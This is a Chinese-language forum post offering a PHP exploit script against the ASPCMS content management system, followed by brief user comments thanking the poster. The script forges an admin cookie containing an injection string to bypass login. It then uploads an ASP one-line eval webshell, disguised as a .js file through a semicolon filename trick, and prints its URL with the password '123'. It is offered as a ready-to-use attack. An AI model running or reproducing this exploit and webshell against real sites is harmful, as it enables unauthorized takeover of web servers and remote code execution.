ASPCMS绕过后台验证拿webshell【针对可绕过cookie的版本】
<?php
print_r('
+---------------------------------------------------------------------------+
ASPCMS绕过后台验证拿webshell
说明:/templates/cn/html/c.asp;.js 密码123
+---------------------------------------------------------------------------+
');
if ($argc <2){
print_r('
+---------------------------------------------------------------------------+
Usage: php '.$argv[0].' url path
Example:
php '.$argv[0].' localhost
php '.$argv[0].' localhost /admin%5Faspcms/
+---------------------------------------------------------------------------+
');
exit;
}
error_reporting(7);
ini_set('max_execution_time', 0);
$url = $argv[1];
$path = $argv[2]?$argv[2]:'/admin%5Faspcms/';
$path = $path .'/_style/AspCms_TemplateAdd.asp?acttype=html&action=add';
$ret=exploit($url,$path);
$scan="添加成功";
if (strpos($ret,$scan)){
echo "WEBSHELL已拿到\r\n";
echo "http://$url/templates/cn/html/f.asp;.js";
exit;
}
function exploit($host,$path){
$pmsg="filename=f.asp%3B.js&filetext=%3C%25eval+request%28%22123%22%29%25%3E";
$len=strlen($pmsg);
$payload ="POST $path HTTP/1.1\r\n";
$payload.="Host: $host\r\n";
$payload.="User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:13.0) Gecko/20100101 Firefox/13.0.1\r\n";
$payload.="Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
$payload.="Accept-Language: en-us,en;q=0.5\r\n";
$payload.="Accept-Encoding: deflate\r\n";
$payload.="Connection: close\r\n";
$payload.="Cookie: adminName=admin;groupMenu=all;adminrand='or+loginname%3d'admin\r\n";
$payload.="Content-Type: application/x-www-form-urlencoded\r\n";
$payload.="Content-Length: $len\r\n\r\n";
$payload.=$pmsg;
$fp = fsockopen($host, 80);
fputs($fp, $payload);
$resp = '';
while ($fp && !feof($fp))
$resp .= fread($fp, 1024);
return $resp;
}
?>
评论9次
拿走。。。。。。谢谢。。。
XDAY了~!!!
迟了
收了~
不是很久就有了吗?
这东西收藏下来了~
前几天就更新啦 最新版用session 了 以前都用COOKIE
已测试,不过需要知道后台,鸡肋哦。
收了